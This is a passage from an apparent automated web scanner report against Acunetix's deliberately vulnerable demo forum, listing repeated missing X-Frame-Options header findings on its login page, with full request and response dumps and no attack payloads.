</tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=41 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=42 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=43 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
